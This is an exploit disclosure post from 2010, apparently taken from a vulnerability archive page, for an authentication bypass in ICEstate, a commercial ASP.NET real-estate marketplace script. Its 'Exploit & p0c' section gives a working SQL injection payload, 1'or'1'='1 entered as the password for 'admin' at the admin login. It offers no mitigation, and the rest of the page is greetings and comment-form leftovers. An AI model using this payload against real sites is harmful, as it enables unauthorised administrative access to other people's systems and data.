ICEstate Authentication Bypass Vulnerability

2010.11.19

Credit: v3n0m

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

-----------------------------------------------------------------------
            ICEstate Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: November, 19-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: ICEstate - Real Estate Marketplace Site ASP.NET Script
Price		: $65.90
Vendor  	: http://www.icloudcenter.com/

Exploit & p0c
_____________

go to
    http://127.0.0.1/[path]/admin
 
then login with
    Username : admin
    Password : 1'or'1'='1

ShoutZ
______

All YOGYACARDERLINK CREW, GheMaX, LeQhi, IdioT_InsidE
Also Jovita & Fabian :)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ICEstate Authentication Bypass Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.